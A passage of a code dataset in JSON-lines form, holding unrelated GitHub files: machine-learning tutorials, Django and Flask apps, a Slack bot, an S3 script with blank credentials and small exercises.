plt.subplot(5, 5, i + 1)\n plt.xticks([])\n plt.yticks([])\n plt.grid(False)\n plt.imshow(train_images[i], cmap=plt.cm.binary)\n plt.xlabel(class_names[train_labels[i]])\nplt.show()\n\nmodel = keras.Sequential([\n keras.layers.Flatten(input_shape=(28, 28)),\n keras.layers.Dense(128, activation=tf.nn.relu),\n keras.layers.Dense(10, activation=tf.nn.softmax)\n])\n\nmodel.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n\nmodel.fit(train_images, train_labels, epochs=5)\n\ntest_loss, test_acc = model.evaluate(test_images, test_labels)\nprint('Test accuracy: ', test_acc)\n\npredictions = model.predict(test_images)\nprint(predictions[0])\n\n# Most confident that the image is in the printed category\nprint(np.argmax(predictions[0]))\n\n# The actual category of the image\nprint(test_labels[0])\n\n\ndef plot_image(i, predictions_array, true_label, img):\n predictions_array, true_label, img = predictions_array[i], true_label[i], img[i]\n plt.grid(False)\n plt.xticks([])\n plt.yticks([])\n\n plt.imshow(img, cmap=plt.cm.binary)\n\n predicted_label = np.argmax(predictions_array)\n if predicted_label == true_label:\n color = 'blue'\n else:\n color = 'red'\n\n plt.xlabel(\"{} {:2.0f}% ({})\".format(class_names[predicted_label],\n 100 * np.max(predictions_array),\n class_names[true_label]),\n color=color)\n\ndef plot_value_array(i, predictions_array, true_label):\n predictions_array, true_label = predictions_array[i], true_label[i]\n plt.grid(False)\n plt.xticks([])\n plt.yticks([])\n thisplot = plt.bar(range(10), predictions_array, color=\"#777777\")\n plt.ylim([0, 1])\n predicted_label = np.argmax(predictions_array)\n\n thisplot[predicted_label].set_color('red')\n thisplot[true_label].set_color('green')\n\nnum_rows = 5\nnum_cols = 3\nnum_images = num_rows * num_cols\nplt.figure(figsize=(2 * 2 * num_cols, 2 * num_rows))\nfor i in range(num_images):\n plt.subplot(num_rows, 2 * num_cols, 2 * i + 1)\n plot_image(i, predictions, test_labels, test_images)\n plt.subplot(num_rows, 2 * num_cols, 2 * i + 2)\n plot_value_array(i, predictions, test_labels)\nplt.show()\n\nimg = test_images[0]\nimg = (np.expand_dims(img, 0))\npredictions_single = model.predict(img)\nplot_value_array(0, predictions, test_labels)\n_ = plt.xticks(range(10), class_names, rotation = 45)\n\ndef print_hi(name):\n # Use a breakpoint in the code line below to debug your script.\n print(f'Hi, {name}') # Press Ctrl+F8 to toggle the breakpoint.\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n print_hi('PyCharm')\n\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n","repo_name":"LukeEff/TensorflowImageRecognition","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"23241233541","text":"def js(n):\n lst = []\n for i in range(1, n + 1):\n if i % 2 != 0:\n lst.append(i)\n return lst\n\n\na = int(input())\nt = 1\nsum = 0\nfor k in js(a):\n t = 1\n for j in range(1, k + 1):\n t = t * j\n sum = sum + t\nprint(f\"sum={sum}\")\n","repo_name":"Yanoisame/PTA-HomeWorks","sub_path":"py/循环题型/7-95 计算奇数阶乘之和.py","file_name":"7-95 计算奇数阶乘之和.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"3879132709","text":"# Databricks notebook source\ndbutils.widgets.text(\"p_file_date\",\"2021-03-21\")\nv_file_date = dbutils.widgets.get(\"p_file_date\")\n\n# COMMAND ----------\n\n# MAGIC %run \"../includes/configuration\"\n\n# COMMAND ----------\n\n# MAGIC %run \"../includes/common_functions\"\n\n# COMMAND ----------\n\nrace_year_list = race_year_list_func(presentation_folder_path,\"race_results\",v_file_date)\n\n# COMMAND ----------\n\ndf = spark.read.format(\"delta\").load(f\"{presentation_folder_path}/race_results\") \\\n.filter(col(\"race_year\").isin(race_year_list))\n\n# COMMAND ----------\n\ndf1 = sum_points_and_group_by_func(df,[\"race_year\",\"team\"])\n\n# COMMAND ----------\n\nfinal_df = rank_by_year_func(df1)\n\n# COMMAND ----------\n\noverwrite_partition_write_table(final_df,'f1_presentation','constructor_standings','race_year',['race_year','team'])\n\n# COMMAND ----------\n\n\n","repo_name":"ryaneaston0517/formula1_databricks_demo","sub_path":"presentation/3 - constructor_standings.py","file_name":"3 - constructor_standings.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"16617977409","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\n# Notice that by pinyin I mean spellings for Cantonese.\n\n# Input: list with char + pinyin\n# Output: list of unique pinyins\n\nimport sys\n\nf1 = open(\"web/exact-Google-pinyins.txt\", \"r\")\t\t\t# format: \"字pinyin\" or \"字字pinyin pinyin\"\n\n# Output Format:\n# consonant\n# nucleus\n\nconsonants = [ 'b','p','m','f','d','t','n','l','g','k','h','j','q','w','x','y','r' ]\n# 'zh','ch','sh','z','c','s' are treated as special cases\n\nvowels = ['a', 'e', 'i', 'o', 'u']\t\t# 'y' may be special case?\n\nks = set()\nns = set()\n\n# ***** convert to consonant-nucleus form *****\ndef k_n(pinyin_):\n\t# test for special cases: z,c,s,zh,ch,sh\n\tc = pinyin_[0]\n\tconsonant = \"\"\n\tnucleus = \"\"\n\tif c in vowels:\t\t\t\t\t\t\t# consonant doesn't exist\n\t\tnucleus = pinyin_\n\t\treturn [consonant, nucleus]\n\n\tconsonant = c\n\tif len(pinyin_) == 1:\t\t\t\t\t# only 1 pinyin letter, eg 'm'\n\t\treturn [consonant, \"\"]\n\n\tc = pinyin_[1]\n\tif c in vowels:\t\t\t\t\t\t\t# 1 consonant followed by vowel(s)\n\t\tnucleus = pinyin_[1:]\n\t\treturn [consonant, nucleus]\n\n\tconsonant += c\n\tif len(pinyin_) == 2:\t\t\t\t\t# only 2 pinyin letters, eg 'ng'\n\t\treturn [consonant, \"\"]\n\t\n\tc = pinyin_[2]\n\tif not c in vowels and c != 'y':\t\t# 'y' is special vowel\n\t\tprint(\"abnormal: >2 consonants\")\n\t\tprint(line)\n\t\treturn [\"\", \"\"]\n\telse:\n\t\tnucleus = pinyin_[2:]\n\t\treturn [consonant, nucleus]\n\nfor line in f1:\n\tif ord(line[1]) > 127:\t\t\t\t# ignore phrases for now\n\t\tcontinue\n\n\tpinyin = line[1:-1]\t\t\t\t\t\t# last char is '\\n'\n\t# print (pinyin)\n\n\t[k, n] = k_n(pinyin)\n\tks.add(k)\n\tns.add(n)\n\nfo = sys.stdout\n# fo = open(\"Google-unique-pinyins.txt\", \"w\")\n\nfo.write('// consonants:\\n')\n\nfor k in ks:\n\tfo.write(k + '\\n')\n\nfo.write('// vowels:\\n')\n\nfor n in ns:\n\tfo.write(n + '\\n')\n\nfo.close()\n","repo_name":"Cybernetic1/conceptual-keyboard-v1_bad","sub_path":"find-unique-pinyins.py","file_name":"find-unique-pinyins.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"79"} +{"seq_id":"25967537943","text":"from django.urls import path\r\n\r\nfrom . import views\r\n\r\nurlpatterns =[\r\n path('', views.index, name='index'),\r\n path('personnel', views.personnel, name='personnel'),\r\n path('projects/complete', views.c_projects, name='c-projects'),\r\n path('projects/pending', views.p_projects, name='p-projects'),\r\n path('products', views.products, name='products')\r\n]\r\n\r\n","repo_name":"earlestradalopez/javeryconstruction","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"28767851989","text":"import pytest\nfrom main import (\n read_puzzle_input,\n calc_n_paths,\n calc_n_paths_revisited,\n)\n\n\n@pytest.mark.parametrize(\n \"test_input, n_paths\",\n [\n (\"small_test_input.txt\", 10),\n (\"medium_test_input.txt\", 19),\n (\"large_test_input.txt\", 226),\n ],\n)\ndef test_calc_n_paths_with_test_inputs(test_input, n_paths):\n puzzle_input = read_puzzle_input(test_input)\n assert n_paths == calc_n_paths(puzzle_input)\n\n\n@pytest.mark.parametrize(\n \"test_input, n_paths\",\n [\n (\"small_test_input.txt\", 36),\n (\"medium_test_input.txt\", 103),\n (\"large_test_input.txt\", 3509),\n ],\n)\ndef test_calc_n_paths_revisited_with_test_inputs(test_input, n_paths):\n puzzle_input = read_puzzle_input(test_input)\n assert n_paths == calc_n_paths_revisited(puzzle_input)\n","repo_name":"DerPhysikeR/advent_of_code_2021","sub_path":"12/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7392859221","text":"from django.shortcuts import render\nfrom GeneTest.nucleus import *\nfrom GeneTest import pedigree\nfrom GeneTest.models import *\nfrom django.shortcuts import render\nfrom home.forms import UserForm,UserProfileInfoForm\nfrom django.contrib.auth.models import User\nfrom home.models import UserProfileInfo\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.urls import reverse\nfrom django.contrib.auth.decorators import login_required\n\nglobal generations\ngenerations={}\n\n\n@login_required\ndef index(request):\n if request.user.is_authenticated:\n user=User.objects.get(username=request.user.username)\n user=UserProfileInfo.objects.get(user=user)\n user_traits=have.objects.filter(user_id=user)\n if len(user_traits)>0:\n results=tests.objects.filter(user_id1=user)\n results=results.union(tests.objects.filter(user_id2=user))\n print(results)\n #here's going to be some history, previous tests\n return render(request,'GeneTest/index.html',{'results':results})\n else:\n traits=trait.objects.all()\n genes={}\n for i in traits:\n genes[i]=gene.objects.filter(trait_name=i)\n print(genes)\n return render(request,'GeneTest/gene_registration.html',{'genes':genes})\n@login_required\ndef TraitDeseaseTest(request,user1=None,user2=None):\n test_types={'Trait test':'trait','Desease test':'desease','Alltogether':'all'}\n if request.method=='POST':\n user1=User.objects.get(username=request.user.username)\n user1=UserProfileInfo.objects.get(user=user1)\n user2=User.objects.get(username=request.POST.get('User2',False))\n user2=UserProfileInfo.objects.get(user=user2)\n test_name=test_types[request.POST.get('test_type',False)]\n context=run(user1,user2,test_name)\n if user1.sex==user2.sex:\n return HttpResponse('Gays can\\'t have children, sorry!')\n else:\n print(context)\n TEST={}\n TEST['test']=context['test']\n TEST['figure']=context['figure']\n TEST['result']=context['result']\n TEST['recombination']=recombination.objects.filter(test_id=context['test'])\n return render(request,'GeneTest/results.html',TEST)\n else:\n return HttpResponse('???')\n\n@login_required\ndef SelfTest(request):\n if request.method=='POST':\n user=User.objects.get(username=request.user.username)\n user=UserProfileInfo.objects.get(user=user)\n mom=request.POST.get('mom')\n dad=request.POST.get('dad')\n user1=User.objects.get(username=mom)\n user1=UserProfileInfo.objects.get(user=user1)\n user2=User.objects.get(username=dad)\n user2=UserProfileInfo.objects.get(user=user2)\n test_name='trait'\n context=run(user1,user2,test_name)\n if user1.sex==user2.sex:\n return HttpResponse('Gays can\\'t have children, sorry!')\n else:\n print(context)\n TEST={}\n TEST['test']=context['test']\n TEST['figure']=context['figure']\n TEST['result']=context['result']\n TEST['recombination']=recombination.objects.filter(test_id=context['test'])\n #t=tests.objects.get(test_id=TEST['test'].test_id)\n TEST['test'].accessor=user\n TEST['test'].save()\n return HttpResponseRedirect('/account/profile/')\n else:\n return HttpResponse('???')\n\n@login_required\ndef result(request,test_id):\n if request.method=='GET':\n TEST={}\n TEST['test']=tests.objects.get(test_id=test_id)\n TEST['figure']=figure.objects.get(test_id=TEST['test'])\n TEST['result']=figure.objects.get(test_id=TEST['test'])\n TEST['recombination']=recombination.objects.filter(test_id=TEST['test'])\n print(TEST)\n return render(request,'GeneTest/results.html',TEST)\n@login_required\ndef delete(request,test_id):\n if request.method=='GET':\n t=tests.objects.get(test_id=test_id)\n t.delete()\n return render(request,'account/index.html',{})\n@login_required\ndef gene_registration(request):\n if request.user.is_authenticated:\n user=User.objects.get(username=request.user.username)\n user=UserProfileInfo.objects.get(user=user)\n if request.method=='POST':\n for i in request.POST:\n if i!='csrfmiddlewaretoken' and i!='blank':\n try:\n h=have.objects.create(user_id=user, gene_name=gene.objects.get(NCIB_ID=request.POST.get(i)))\n h.save()\n except:\n pass\n return render(request,'GeneTest/index.html',{})\n\n\n#----------------------PEDIGREE PART -----------------------------------------------\n\n\n\ndef get_child(object):\n if object.sex:\n ch=type(object).objects.filter(dad=object)\n else:\n ch=type(object).objects.filter(mom=object)\n if len(ch)>0:\n return ch\n else:\n return None\n\ndef get_other_parent(object):\n GT=get_child(object)\n if GT is not None:\n if object.sex:\n return GT[0].mom\n else:\n return GT[0].dad\n else:\n return None\n\ndef FindFirstGeneration(UserObject):\n if (UserObject.mom is not None) and (UserObject.dad is not None):\n return FindFirstGeneration(UserObject=UserObject.mom),FindFirstGeneration(UserObject=UserObject.dad)\n elif (UserObject.mom is None) and (UserObject.dad is not None):\n return FindFirstGeneration(UserObject=UserObject.dad)\n elif (UserObject.mom is not None) and (UserObject.dad is None):\n return FindFirstGeneration(UserObject=UserObject.mom)\n else:\n return OrderAllGenerations(0,UserObject)\n\ndef OrderAllGenerations(index,UserObject):\n global generations\n child=get_child(UserObject)\n if child is not None:\n if index in generations.keys():\n if child[0] not in generations[index]:\n generations[index].append(child[0])\n else:\n generations[index]=[child[0]]\n for i in child:\n return OrderAllGenerations(index+1,i)\n else:\n generations[10000]=[UserObject]\n return generations\n\ndef QueryToParentObject(QueryObject, CarriedGene,list):\n return pedigree.Parent(doesHave=pedigree.DoesMemberHave(list,QueryObject.user.username),desease=CarriedGene,sex=QueryObject.sex,ID=QueryObject.user.username)\n\n@login_required\ndef DrawPedigree(request,gene_id=None,username=None):\n global generations\n generations={}\n subfamily={}\n user=User.objects.get(username=request.user.username)\n user=UserProfileInfo.objects.get(user=user)\n context=FindFirstGeneration(user)\n while isinstance(context,dict) is False:\n context=list(context).pop()\n traits=trait.objects.filter(type='desease')\n genes=[]\n for i in traits:\n genes.append(gene.objects.get(trait_name=i))\n if (username is not None) and (gene_id is not None):\n generations={}\n subfamily2={}\n user2=User.objects.get(username=username)\n user2=UserProfileInfo.objects.get(user=user2)\n context2=FindFirstGeneration(user2)\n while isinstance(context2,dict) is False:\n context2=list(context2).pop()\n desease=gene.objects.get(NCIB_ID=gene_id)\n DeseaseCarrier=have.objects.filter(gene_name=desease)\n\n GeneOfDesease=pedigree.Gene(inheritance=desease.trait_name.inheritance,name=desease.NCIB_ID,is_X_linked=desease.IsXLinked)\n DoesHaveList=[i.user_id.user.username for i in DeseaseCarrier]\n FamilyMembers={'user1':[],'user2':[]}\n user1=context\n user2=context2\n #user1.pop(10000)\n #user2.pop(10000)\n USERS={'user1':user1, 'user2':user2}\n for user in USERS.keys():\n FamilyMembers[user]=[]\n for i in USERS[user].keys():\n for j in USERS[user][i]:\n if len(FamilyMembers[user])==0:\n u=QueryToParentObject(j,GeneOfDesease,DoesHaveList)\n u.add_dad(QueryToParentObject(j.dad,GeneOfDesease,DoesHaveList))\n u.add_mom(QueryToParentObject(j.mom,GeneOfDesease,DoesHaveList))\n FamilyMembers[user].append(u)\n else:\n u=QueryToParentObject(j,GeneOfDesease,DoesHaveList)\n for i in FamilyMembers[user]:\n if i.ID == j.dad.user.username:\n u.add_dad(i)\n if i.ID == j.mom.user.username:\n u.add_mom(i)\n if u.mom is None:\n u.add_mom(QueryToParentObject(j.mom,GeneOfDesease,DoesHaveList))\n if u.dad is None:\n u.add_dad(QueryToParentObject(j.dad,GeneOfDesease,DoesHaveList))\n FamilyMembers[user].append(u)\n user1=FamilyMembers['user1'].pop()\n user2=FamilyMembers['user2'].pop()\n user1.set_genotype()\n user2.set_genotype()\n for u in [user1,user2]:\n print(u.desease.inheritance, '\\t' ,u.desease.genotype)\n if u.desease.inheritance=='recessive':\n if (u.desease.genotype == 0) and (u.ID not in DeseaseCarrier):\n us=User.objects.get(username=u.ID)\n g=gene.objects.get(NCIB_ID=u.desease.name)\n g.IsGenotypeSet=True\n g.save()\n have.objects.create(user_id=UserProfileInfo.objects.get(user=user2),gene_name=g)\n #change genotypes in the database\n else:\n if (u.ID not in DeseaseCarrier) and (u.desease.genotype==1):\n us=User.objects.get(username=u.ID)\n g=gene.objects.get(NCIB_ID=u.desease.name)\n g.IsGenotypeSet=True\n g.save()\n have.objects.create(user_id=UserProfileInfo.objects.get(user=us),gene_name=g)\n DeseaseCarrier=have.objects.filter(gene_name=desease)\n return render(request,'GeneTest/pedigree.html',{'UserFamily':context, 'PartnerFamily':context2,'genes':genes, 'carrier':DeseaseCarrier,'UserGenotypes':[user1,user2]})\n else:\n return render(request,'GeneTest/pedigree.html',{'UserFamily':context, 'genes':genes})\n","repo_name":"KristofGabor/MixYourGenes","sub_path":"pythonenv/MixYourGenes/GeneTest/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"31608790667","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Nov 7 11:13:05 2019\r\n\r\n@author: lyh\r\n\r\n **Calculating orbit parameters**\r\n\r\n :alt0: Initial orbit height [km]\r\n :inc: Inclination [deg]\r\n :e: Eccentricity\r\n :re_cycle_num: Repeat cycle number [number/cycle]\r\n :alt: Final orbit height [km]\r\n :v: Satellite velocity [km/s]\r\n :dis: Sampling distance at equator [km]\r\n\r\n \"\"\"\r\n\r\nimport numpy as np\r\nfrom constants import constants as const\r\n\r\n\r\ndef orbit_com(alt0, inc, e, re_cycle_num, re_day, con_repeat=False):\r\n \r\n threshold = 10\r\n max_in = 100\r\n i = 0\r\n if con_repeat:\r\n while i\"\nAWS_SECRET=\"\"\nAWS_REGION=\"\"\n\ns3 = boto3.client('s3', aws_access_key_id=AWS_KEY, aws_secret_access_key=AWS_SECRET)\n\ns3.create_bucket(Bucket='')","repo_name":"sigier/aws-infra","sub_path":"S3_create_bucket.py","file_name":"S3_create_bucket.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71854028096","text":"from typing import Any, Type\n\nfrom pydantic import GetJsonSchemaHandler\nfrom pydantic.json_schema import JsonSchemaValue\nfrom pydantic_core import core_schema\n\nEMAIL_PATTERN = r\"^[^@ \\t\\r\\n]+@[^@ \\t\\r\\n]+\\.[^@ \\t\\r\\n]+$\"\n\n\nclass Email(str):\n \"\"\"Email address of a person, organization or other entity.\"\"\"\n\n @classmethod\n def __get_pydantic_core_schema__(cls, _source: Type[Any]) -> core_schema.CoreSchema:\n \"\"\"Get pydantic core schema.\"\"\"\n return core_schema.str_schema(pattern=EMAIL_PATTERN)\n\n @classmethod\n def __get_pydantic_json_schema__(\n cls, core_schema_: core_schema.CoreSchema, handler: GetJsonSchemaHandler\n ) -> JsonSchemaValue:\n \"\"\"Add title and format.\"\"\"\n field_schema = handler(core_schema_)\n field_schema[\"title\"] = cls.__name__\n field_schema[\"format\"] = \"email\"\n field_schema[\"examples\"] = [\"info@rki.de\"]\n return field_schema\n","repo_name":"robert-koch-institut/mex-common","sub_path":"mex/common/types/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"79"} +{"seq_id":"41347427335","text":"import os\n\nimport click\n\nfrom app import create_app\n\n\n@click.group()\ndef main():\n pass\n\n\n@click.command()\ndef docs():\n \"\"\"\n 需要安装apidoc, `npm install apidoc -g`\n \"\"\"\n os.system(\"apidoc -i app/ -o docs/\")\n\n\n@click.command()\ndef run():\n \"\"\"\n 运行开发服务器\n \"\"\"\n app = create_app()\n app.run(host=\"0.0.0.0\", port=5001)\n\n\n@click.command()\n@click.option(\n \"--action\",\n prompt=\"\"\"请选择下一步操作:\n1. 生成 .pot 模板文件\n2. 为某个语言生成 .po 文件\n3. 重新生成 .pot 模板文件并更新 .po 文件\n4. 生产 .mo 文件\n\"\"\",\n type=int,\n)\ndef local(action):\n cfg_path = \"babel.cfg\"\n locale_folder = \"app/locales\"\n pot_filename = \"messages.pot\"\n pot_path = os.path.join(locale_folder, pot_filename)\n if not os.path.isdir(locale_folder):\n os.makedirs(locale_folder)\n if action == 1:\n os.system(\n \"pybabel extract -F {cfg_path} -k lazy_gettext -o {pot_path} .\".format( # noqa: E501\n cfg_path=cfg_path, pot_path=pot_path\n )\n )\n elif action == 2:\n if not os.path.isfile(pot_path):\n pass\n lang_name = click.prompt(\"Please enter a language name\")\n os.system(\n \"pybabel init -i {pot_path} -d {locale_folder} -l {lang_name}\".format( # noqa: E501\n pot_path=pot_path,\n locale_folder=locale_folder,\n lang_name=lang_name,\n )\n )\n elif action == 3:\n os.system(\n \"pybabel extract -F {cfg_path} -k lazy_gettext -o {pot_path} .\".format( # noqa: E501\n cfg_path=cfg_path, pot_path=pot_path\n )\n )\n os.system(\n \"pybabel update -i {pot_path} -d {locale_folder}\".format(\n pot_path=pot_path, locale_folder=locale_folder\n )\n )\n elif action == 4:\n os.system(\n \"pybabel compile -d {locale_folder}\".format(locale_folder=locale_folder)\n )\n\n\nmain.add_command(run)\nmain.add_command(local)\nmain.add_command(docs)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kozzzx/moeflow-backend","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"79"} +{"seq_id":"19932907449","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n-----------------------------------------\n * * * Angeles Motors Inc. * * *\n-----------------------------------------\n\nCreated on Tue Jun 9 10:41:55 2020\n\n@author: bianhungchen\n\nSource:\n \nFunction:\n \n\"\"\"\n\n\n\nimport unittest\nimport test_usb\n\nclass testingusb(unittest.TestCase):\n \n # def setUpClass(self):\n # self.usb_info = test_usb.get_usb_info() # for example\n\n \n def test_info(self):\n usb_info = test_usb.get_usb_info() # for example\n \n self.assertEqual(test_usb.get_usb_info(), usb_info )\n\n # def tearDownClass(self):\n # print('done')\n\n\nif __name__ == '__main__':\n unittest.main()\n \n\n\n \n\n\n \n\n\n \n\n\n","repo_name":"hugochen121/test","sub_path":"unittest_TestCase_USB.py","file_name":"unittest_TestCase_USB.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"26509328077","text":"import logging\nimport random\n\nimport requests\nfrom slackclient import SlackClient\n\n\nclass Communicator:\n \"\"\"Class handling communication to Slack, and with Radio REST API.\"\"\"\n channel_mention = \"\"\n current_shows_uri = \"/v2/sendinger/currentshows\"\n\n def __init__(self, slack_client: SlackClient, settings):\n self.slack_client = slack_client\n self.settings = settings\n self.first_message_ts = None\n self.username = None\n self.userid = None\n\n def send(self, message_type, num_minutes=None, reply_to=None, **kwargs):\n \"\"\"Send the given message type to Slack.\n\n Args:\n message_type: The key of self.settings.messages to use to look up\n message texts, from which one is picked at random.\n num_minutes: If provided, the value of\n self.settings.messages[message_type] is assumed to be a dict.\n All items in that dict which have a key less than or equal to\n num_minutes are chosen, or all messages from the highest key\n which matches that criteria if\n settings.messages['warnings_cumulative'] is False.\n reply_to: If provided, the message sent will be a reply to the\n given message. This should be the dictionary received from the\n Slack message event.\n kwargs: The text string will have {key} replaced with value for\n each key=value given to this method.\n \"\"\"\n possible_unformatted_message = self.settings.messages[message_type]\n\n if num_minutes is not None:\n matching_messages = []\n max_from_minute = 0\n for from_minute, messages in possible_unformatted_message.items():\n if from_minute <= num_minutes:\n if self.settings.messages['warnings_cumulative']:\n matching_messages.extend(messages)\n elif from_minute >= max_from_minute:\n matching_messages = messages\n max_from_minute = from_minute\n\n possible_unformatted_message = matching_messages\n\n unformatted_message = random.choice(possible_unformatted_message)\n\n formatted_message = unformatted_message.format(\n channel=self.channel_mention,\n **kwargs\n )\n self.send_custom(formatted_message, reply_to)\n\n def send_custom(self, message, reply_to=None):\n \"\"\"Send the given message to Slack.\n\n Args:\n message: The text to post on Slack.\n reply_to: If provided, the message will be sent as a reply to the\n message whose information is provided in this argument. Its\n format is equal to the dictionary received in message events\n from Slack.\n \"\"\"\n other_message_args = {\n 'channel': self.settings.channel,\n }\n\n if reply_to:\n if 'thread_ts' in reply_to:\n thread_ts = reply_to['thread_ts']\n else:\n thread_ts = reply_to['ts']\n other_message_args['thread_ts'] = thread_ts\n other_message_args['channel'] = reply_to['channel']\n\n data = self.slack_client.api_call(\n \"chat.postMessage\",\n text=message,\n as_user=True,\n **other_message_args\n )\n assert data['ok'], data\n if not self.first_message_ts:\n self.first_message_ts = data['ts']\n\n def thumb_up_msg(self, received_message):\n \"\"\"React with :+1: to the given message.\n\n Args:\n received_message: The dictionary received from a Slack message event\n \"\"\"\n data = self.slack_client.api_call(\n \"reactions.add\",\n name=\"+1\",\n timestamp=received_message[\"ts\"],\n channel=received_message[\"channel\"]\n )\n assert data['ok'], data\n\n def get_userid(self):\n \"\"\"Get the userid of the logged in bot.\"\"\"\n if not self.userid:\n self.populate_identity()\n return self.userid\n\n def get_username(self):\n \"\"\"Get the username of the logged in bot.\"\"\"\n if not self.username:\n self.populate_identity()\n return self.username\n\n def populate_identity(self):\n \"\"\"Populate username and userid of the logged in bot.\"\"\"\n data = self.slack_client.api_call(\n \"auth.test\"\n )\n assert data['ok'], data\n self.userid = data['user_id']\n self.username = data['user']\n\n def get_first_message_ts(self):\n \"\"\"Get the ts of the first message sent by us in this session.\"\"\"\n return self.first_message_ts\n\n def get_current_show(self):\n \"\"\"Get the name of the show currently active on radio.\"\"\"\n try:\n r = requests.get(self.settings.rr_api + self.current_shows_uri, timeout=10.0)\n r.raise_for_status()\n except Exception as e:\n logging.exception(\"Error occurred while retrieving current show\")\n return \"Ukjent (ikke kontakt med pappagorg, eller APIet er nede)\"\n data = r.json()\n try:\n return data[\"current\"][\"title\"]\n except KeyError:\n logging.error(\"No show found when trying to obtain current show\")\n return \"Ukjent (ingen sending i autoavvikler)\"\n\n","repo_name":"Studentmediene/silence-notifier-slack","sub_path":"silence_notifier/communication.py","file_name":"communication.py","file_ext":"py","file_size_in_byte":5410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"33689755744","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Soham Shah\n\n\"\"\"\nimport cv2\nimport numpy as np\ncap = cv2.VideoCapture(0)\n\nwhile(1):\n _,frame = cap.read()\n hsv = cv2.cvtColor(frame,cv2.COLOR_BGR2HSV)\n \n lower_red = np.array([0,120,70])\n upper_red = np.array([10,255,255])\n mask1 = cv2.inRange(hsv, lower_red, upper_red)\n \n lower_red = np.array([170,120,70])\n upper_red = np.array([180,255,255])\n \n mask2 = cv2.inRange(hsv,lower_red,upper_red)\n mask1 = mask1+mask2\n \n res = cv2.bitwise_and(frame,frame,mask=mask1)\n \n cv2.imshow('frame',frame)\n cv2.imshow('mask',mask1)\n cv2.imshow('res',res)\n k = cv2.waitKey(5) & 0xFF\n if k==27:\n break\n \ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"sohamsshah/Playing-Around-with-OpenCV","sub_path":"Computer Vision Snippets/Color_Detection.py","file_name":"Color_Detection.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"7410142376","text":"def compute_area_rectangle(width, height):\n area = width * height\n return area\ndef compute_area_square(side):\n area = compute_area_rectangle(side, side)\n return area\ndef compute_area_circle(radius):\n area = radius * radius * 3.14159\n return area\ndef compute_area(shape, value, value2 = 1):\n if shape == \"circle\":\n area = compute_area_circle(value)\n if shape == \"square\":\n area = compute_area_square(value)\n if shape == \"rectangle\":\n area = compute_area_rectangle(value, value2)\n return area\nshape = \"\"\nwhile shape != \"quit\":\n value = 0\n value2 = 0\n shape = \"\"\n while shape != \"circle\" and shape != \"square\" and shape != \"rectangle\" and shape != \"quit\":\n shape = input(\"What shape would you like to calculate the area of? Circle, Square, or Rectangle?\\n-->:\").lower()\n if shape == \"circle\":\n value = float(input(\"Enter the Radius: \"))\n elif shape == \"square\":\n value = float(input(\"Enter the Side Length: \"))\n elif shape == \"rectangle\":\n value = float(input(\"Enter the Sirst Side Length: \"))\n value2 = float(input(\"Enter the Second Side Length: \"))\n if shape != \"quit\":\n area = compute_area(shape, value, value2)\n print(f\"The area is: {area}\")","repo_name":"JoshuaMarti/Programming-Classes","sub_path":"13TTeam.py","file_name":"13TTeam.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"35157341739","text":"from flask import Flask, request, jsonify\nfrom flask_restful import Api, Resource\nfrom keras.models import load_model\nfrom keras.preprocessing.image import load_img, img_to_array\nfrom keras.backend import expand_dims\nfrom keras.applications.inception_v3 import preprocess_input\nimport json\nfrom PIL import Image\nimport urllib.request\nimport numpy as np\n\n\napp = Flask(__name__)\napi = Api(app)\n\nmodel = load_model('inceptionv3.h5') \n## Model loaded from keras\n# from keras.applications import InceptionV3\n# model = InceptionV3(\n# include_top=True,\n# weights=\"imagenet\",\n# classes=1000\n# )\nwith open('imagenet_class_index.json', 'r') as f:\n labels = json.load(f)\n\ndef get_image(image_url):\n with urllib.request.urlopen(image_url) as url:\n with open('temp.jpg', 'wb') as f:\n f.write(url.read())\n\ndef predict():\n image_size = (299, 299)\n img = load_img('temp.jpg', target_size=image_size)\n img_array = img_to_array(img)\n 